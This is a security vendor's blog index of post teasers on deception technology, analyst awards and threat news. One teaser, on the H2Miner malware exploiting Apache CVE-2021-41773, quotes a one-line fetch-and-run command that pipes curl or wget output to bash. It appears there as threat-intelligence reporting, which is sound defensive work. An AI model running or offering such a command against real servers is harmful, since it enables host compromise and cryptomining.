Our blog is a playground with fresh ideas about security and our approach

26 Nov

Deception Tops List of Technologies in 2021 IDG Security Priorities Study


From ransomware to malware affecting critical infrastructure, cyber attacks are more mainstream and more damaging than ever. Keeping up with all the attack vectors and evolving threats gets more challenging by the day. IDG’s recently released 2021 Security Priorities study is an important look at the state of security strategies today. This 2021 report provides an in-depth look at the security landscape today from the valuable viewpoint of its top leaders and decision makers.

23 Nov

CounterCraft Named Overall Leader by KuppingerCole


KuppingerCole recently named CounterCraft as an overall leader in their Distributed Deception Platforms Leadership Compass report. CounterCraft appears as an Overall Leader, a Product Leader, and an Innovation Leader. The report, written by John Tolbert, provides an overview of the market for Distributed Deception Platforms (DDPs) and provides a compass to help guide businesses on their solutions. KuppingerCole examines the market segment, vendor service functionality, relative market share, and innovative approaches to providing DDP solutions.

18 Nov

NIST Documents Highlight Deception Technology


Today, information security (infosec) and cybersecurity are quickly becoming a top priority for organizations, as they should: there are an estimated 200 Advanced Persistent Threat (APT) groups globally, with new ones popping up every day. They range from script kiddies to sophisticated technical experts, backed by foreign nations looking to disrupt our way of life for political gain or cybercriminals attacking organizations for monetary gain. In fact, per Accenture, in 2019 the average cost of cybercrime for organizations was $13 million.

16 Nov

CVE-2021-41773 Actively Exploited by H2Miner


Cloud computing has its share of major security threats, and there are some that are both consistent and insistent. One of them is the H2Miner/Kinsing malware. The people behind it use high-severity, public vulnerabilities to continue installing their RAT and miner, such as the recent Apache Path Traversal CVE-2021-41773, the latest vulnerability added to their already expansive portfolio. In this case, they are looking for servers with mod_cgi enabled in order to directly infect the server by running a simple (curl -s URL||wget -q -O- URL) | bash command, which, if successful, will compromise the host and will even return the script output in the HTTP response.

10 Nov

10 Ways Your Business Can Benefit from Deception


In 2021, deception solutions have grown from a nice-to-have option to a must-have for threat analysis teams, especially at verticals that are constantly targeted and hit by advanced persistent attacks. Deception provides very real value, and we’ve gotten together a list of the biggest benefits of employing deception technology. Read on for our list of the top 10 ways your business can benefit from employing deception techniques as part of its cybersecurity strategy.

9 Nov

Improving OT Security {Data Sheet}


Cyber attacks on critical infrastructure and physical systems are on the rise. From the Colonial pipeline attack to the Florida water plant hack, the threat has become so imminent that the Cybersecurity & Infrastructure Security Agency has released several warnings, including the October 2021 “Ongoing Cyber Threats to U.S. Water and Wastewater Systems” alert. Operational Technology (OT) networks, such as SCADA and Industrial Control Systems (ICS), have many unique characteristics that make defensive countermeasures against cyber attacks a challenging job.

4 Nov

CounterCraft Participates in the MITRE Engenuity ATT&CK Evaluation Trials


CounterCraft is thrilled to announce that we will be participating in the MITRE Engenuity ATT&CK Evaluation Trials for deception. The evaluation trials are tailored, focused research projects into different security solutions. The MITRE Engenuity ATT&CK® Evaluations began in 2018, are designed to provide clarity around ATT&CK coverage, and are well-regarded, industry standard-setting evaluations. It is an honor to be a part of MITRE’s first Trial research project. Read on for more about these exciting Evaluation Trials.

3 Nov

Docker Daemon Worms | Founder Chat


Docker containers are being exploited by cryptojacking worms. It’s an issue we began to see a couple of years ago, and these worms are still alive and kicking. CounterCraft’s founders talk about exactly how this generation of Docker daemon worms works. Our threat intel team created an open Docker daemon. We found that the Cetus worm almost immediately located our open Docker daemon and connected to it. Find out how CounterCraft gathered intel on the exploits happening in real time, as well as what the Docker daemon worms’ workings revealed, including the IOCs of TeamTNT and a quirky naming convention.

30 Oct

What We're Reading


Governments are taking new actions against cyber criminals. Meanwhile, threat actors go after more and more important targets. Read on for the news we’ve been following this month.

A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries

A new APT group, ChamelGang, was identified recently. This group uses a trending penetration method, supply chain, to steal data from compromised networks. The gang targets various industries across Russia, the U.S., India, Nepal, Taiwan, and Japan by disguising its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.

29 Oct

CounterCraft Named 2021 Gartner Cool Vendor


Gartner recently named CounterCraft a 2021 Cool Vendor in the Gartner Cyber-Physical Systems Security report. Being recognized as a Cool Vendor in this sector is a huge validation for the CounterCraft technology and team. Gartner Cool Vendor Reports highlight interesting and innovative vendors, products, and services. Cyber-physical systems are truly one of the most challenging systems to protect in the realm of cybersecurity. Cyber-Physical Systems (CPS) are an integration of computation, networking and physical processes and are very complex, especially when several CPS need to be combined.
